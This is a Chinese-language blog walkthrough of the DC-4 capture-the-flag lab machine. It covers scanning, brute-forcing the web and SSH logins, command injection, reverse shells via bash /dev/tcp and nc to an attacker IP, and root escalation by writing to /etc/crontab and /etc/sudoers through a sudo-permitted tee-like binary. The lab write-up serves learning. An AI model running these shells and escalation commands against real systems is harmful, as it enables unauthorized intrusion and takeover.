畅游DC-4靶机

Posted 2021-03-04 a1oe

信息搜集

nmap -sP 192.168.146.0/24 #扫网段看看存活的主机，找到靶机
nmap -sS -Pn -A 192.168.146.141

可以看到开放了22和80端口，那么就可以猜测下，可能要爆破ssh密码或者得到账号密码直接ssh连上去。
这里先访问web页面，只有一个登陆页面，那就先扫描下目录。

看到访问command.php后又跳转回index.php，那么估计是要登陆才可以使用了。

getFlag

Web登陆密码爆破

这里没什么线索，但是登陆不用填验证码，就直接尝试爆破吧。

爆破出用户名*，密码happy。


也就是说这里只用密码happy就能登陆

命令执行之反弹shell

登陆进页面看到命令执行选项，这种情况估计就是参数传递命令，抓个包看看就行了。

可以看到确实是在radio参数传输命令，但是这样比较麻烦，尝试反弹shell。

bash -i >& /dev/tcp/192.168.146.131/4444 0>&1
这里要将&符号url编码下，以便区分参数间的&符号，当然可以直接全部url编码下。bash反弹失败

nc 192.168.31.131 4444 -t /bin/bash #nc反弹成功

根据之前的靶机，可以直接进入/home目录下看看有哪些用户

经检测，charles和sam目录无法ls出文件，而jim可以。

大概就是mbox我们没有读的权限，backups里面又一堆旧密码，test.sh内容如下

SSH密码爆破

信息搜集的时候我们就知道22端口是开着的，可以ssh上去。
所以这里的old-passwords可能是jim进行ssh的旧密码(现在的密码也可能在其中)，那么就down下来用hydra爆破下。

hydra -l jim -P pwd.txt ssh://192.168.146.141

爆破出用户名是jim，密码是jibril04。直接连上去

提权

ssh jim@192.168.146.141
登陆进去看mbox，是一封邮件

既然有邮件，就想到去/var/mail目录下看看，看到邮件的具体内容。有Charles发来的密码。

密码是^xHhA&hvim0y，准备登陆charles了。在这之前，先看看jim有没有sudo权限，好的是没有的。
sudo -l

有密码了，直接ssh连上去，ls -al查看charles目录下的内容

看这三个文件没有发现什么有用的信息。那就也来看看有没有sudo权限。

可以发现，可以不用密码使用root权限操作/usr/bin/teehee，这个可执行文件，查看下帮助。

它可以将标准输入复制到每个文件，那么好办了，既然可以用root权限写文件？那岂不是直接快乐就完事了？
测试下：（成功写入文件）

想想几个重要的文件，无非就是定时任务文件(crontab)，sudoers文件
先来玩玩定任务文件把。
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

再来写/etc/sudoers文件，先看看本地sudoers文件的语法。

仿造写一个 charles ALL=(ALL:ALL) ALL

可以看到现在charles可以以root用户身份运行所有命令

总结

总的来说这个靶机也并不难，学到的东西好像也并不是很多。。。
主要就学到了利用suid提权，这个利用这个root权限可以写文件。之后就是有写文件权限提权的思路了。